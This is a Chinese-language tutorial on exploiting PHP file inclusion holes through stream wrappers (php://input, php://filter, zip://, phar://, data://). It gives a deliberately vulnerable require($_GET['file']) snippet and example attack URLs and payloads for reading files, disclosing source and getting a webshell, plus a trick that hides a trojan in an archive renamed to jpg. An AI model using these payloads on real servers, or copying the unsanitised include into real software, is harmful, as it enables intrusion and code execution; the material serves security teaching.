PHP文件包含及使用伪协议getshell

• file:// — 访问本地文件系统
• http:// — 访问 HTTP(s) 网址
• ftp:// — 访问 FTP(s) URLs
• php:// — 访问各个输入/输出流（I/O streams）
• zlib:// — 压缩流
• data:// — 数据（RFC 2397）
• glob:// — 查找匹配的文件路径模式
• phar:// — PHP 归档
• ssh2:// — Secure Shell 2
• rar:// — RAR
• ogg:// — 音频流
• expect:// — 处理交互式的流

　首先构造一个具有文件包含漏洞的php文件。

require($_GET['file']);

　其次使用伪协议包含文件并getshell:

　　1、file://：访问本地文件系统。

　　　　

　　　　例如。http://localhost/test.php?file=file://C:\Windows\System32\drivers\etc\hosts

　　　　

　　2、http://：访问http或https的网址

　　　　

　　　　例如：http://localhost/test.php?file=http://www.baidu.com

　　　　

　　　　http://伪协议必须   allow_url_fopen与allow_url_include同时开启。缺一不可。

　　　　此伪协议就是远程文件包含漏洞。可通过其他主机getshell。例如：http://localhost/test.php?file=http://localhost/1.php

　　　　

　　3、php://访问各个输入输出流

　　　　　

　　　　　　php://伪协议，主要为php://input与php://filter

　　　　　　php://input：将POST输入流当做PHP代码执行。其只受   allow_url_include参数的影响，allow_url_fopen开关与此伪协议无关。

　　　　　　例如：开启allow_url_include参数，关闭allow_url_fopen参数。

　　　　　　　　

　　　　　　访问：http://localhost/test.php?file=php://input    POST：<?php phpinfo();

　　　　　　　　

　　　　php://filter伪协议：不受   allow_url_fopen与allow_url_include参数的影响

　　　　　　

　　　　　　此协议主要用于读取php源代码时会用到。

　　　　　　例如：http://localhost/test.php?file=php://filter/read=convert.base64-encode/resource=./1.php

　　　　　　　　

　　　　　　也就是说，将一个PHP文件通过base64编码读出。倘若不加read读取链，则会将其中内容当做PHP代码执行，倘若如此，则无法读取PHP文件内容，于是在读取链中将其编码。

　　　　　　例如：php://filter/resource=./1.txt

　　　　　　　

　　　　　　

　　　　　　所以说，php://filter此协议不受参数影响，即可读取文件内容，也可包含恶意文件直接getshell。

　　　　　　例如：将1.txt修改为

　　　　　　菜刀连接：http://localhost/test.php?file=php://filter/resource=./1.txt

　　　　　　

　　　　　　getshell成功

　　　4、zip://伪协议

　　　　　　

　　　　　　试想倘若有一种情况限制文件后缀为php文件，并且上传文件只能传jpg文件。allow_url_fopen参数与allow_url_include参数全部off的情况下。

　　　　　　

<?php
    $file = $_GET['file'] . '.php';
    include($file);
?>

　　　　　　貌似之前所用伪协议都无效，比较旧的版本可以使用00截断，路劲长度截断等。但是若无截断漏洞该如何？

　　　　　　此种情况下可以使用zip伪协议，将木马放入压缩包中，再将压缩包后缀修改为上传白名单，然后使用zip伪协议进行包含。

　　　　　　例如：zip://绝对路径\需要解压缩的文件%23子文件名

　　　　　　

　　　　5、phar://伪协议

　　　　　　同zip伪协议。故上述问题此协议也可解决。

　　　　　　phar://cc.jpg/cc，与zip协议不同的是zip协议为绝对路径，而phar协议为相对路径。

　　　　　　

　　　　6、data://伪协议

　　　　　　

　　　　　　可以看到，此协议是受 allow_url_include 限制的。所以 allow_url_fopen参数与allow_url_include都需开启。

　　　　　　data://text/plain,<?php phpinfo();?>。test/plain, 后面的值会被当做php代码执行。

　　　　　　

　　　　　　也可如此：data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=